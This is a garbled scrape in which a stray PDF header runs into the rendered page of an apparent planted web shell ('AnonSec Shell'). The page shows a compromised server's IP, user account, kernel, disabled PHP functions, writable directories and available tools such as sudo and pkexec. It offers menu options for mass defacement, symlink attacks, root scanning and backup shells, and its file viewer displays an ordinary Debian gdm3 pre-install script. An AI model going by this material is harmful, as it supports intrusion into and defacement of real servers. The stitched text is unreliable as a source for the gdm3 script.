%PDF-1.4 %Óëéá 1 0 obj <> endobj 3 0 obj <> endobj 4 0 obj < AnonSec Shell
AnonSec Shell
Server IP : 212.252.79.165  /  Your IP : 216.73.217.172   [ Reverse IP ]
Web Server : Apache
System : Linux 212-252-79-165.cprapid.com 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
User : cehaburo ( 1001)
PHP Version : 8.1.33
Disable Function : exec,passthru,shell_exec,system
Domains : 48 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/cehaburo/public_html/images/product/anon_sym/anon/var/lib/dpkg/info/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /home/cehaburo/public_html/images/product/anon_sym/anon/var/lib/dpkg/info/gdm3.preinst
#!/bin/sh

set -e

if [ "$1" = "upgrade" ] || [ "$1" = "install" ]; then
  # Remove wrongly replaced custom.config file by versions > 3.37.90 && < 3.38.1
  # This script can be safely removed post 20.10 release
  prev_version="$2"
  if dpkg --compare-versions "$prev_version" ge 3.37.90 &&
     dpkg --compare-versions "$prev_version" lt-nl 3.38.1; then
    conf_file=/etc/gdm3/daemon.conf
    if [ "${prev_version#*ubuntu}" != "$prev_version" ]; then
      conf_file=/etc/gdm3/custom.conf
    fi

    conf="${DPKG_ROOT}$conf_file"
    if [ -f "$conf" ] &&
       echo "ed0a2d19ba7344faa0feadd783bb4fa5 $conf" | md5sum -c --status; then
      # If the file matches this checksum, then it's a file generated by
      # /usr/libexec/gdm-disable-wayland that was wrongly replaced, so we
      # replace the conf file to match the one that was default in these
      # broken versions, so that dpkg would replace it in case.
      echo "Configuration file $conf_file has likely been damaged by" \
        "https://pad.lv/1899673, replacing with the gdm default..."
      cat <<'EOF' > "$conf"
# GDM configuration storage
#
# See /usr/share/gdm/gdm.schemas for a list of available options.

[daemon]
# Uncomment the line below to force the login screen to use Xorg
#WaylandEnable=false

# Enabling automatic login
#  AutomaticLoginEnable = true
#  AutomaticLogin = user1

# Enabling timed login
#  TimedLoginEnable = true
#  TimedLogin = user1
#  TimedLoginDelay = 10

[security]

[xdmcp]

[chooser]

[debug]
# Uncomment the line below to turn on debugging
# More verbose logs
# Additionally lets the X server dump core if it crashes
#Enable=true

EOF

      # Verify that the file we've just added matches the default one
      # We don't fail as it's not a fatal error, but will cause manual
      # intervention at later points
      default_md5sum="$(dpkg-query -W -f='${Conffiles}' gdm3 | \
       sed -n -e "\\'^ $conf_file ' { s/ obsolete$//; s/.* //; p }")"
      echo "$default_md5sum $conf" | md5sum -c --status ||
        echo "Replaced configuration file isn't matching expected default"
    fi
  fi
fi



Anon7 - 2022
AnonSec Team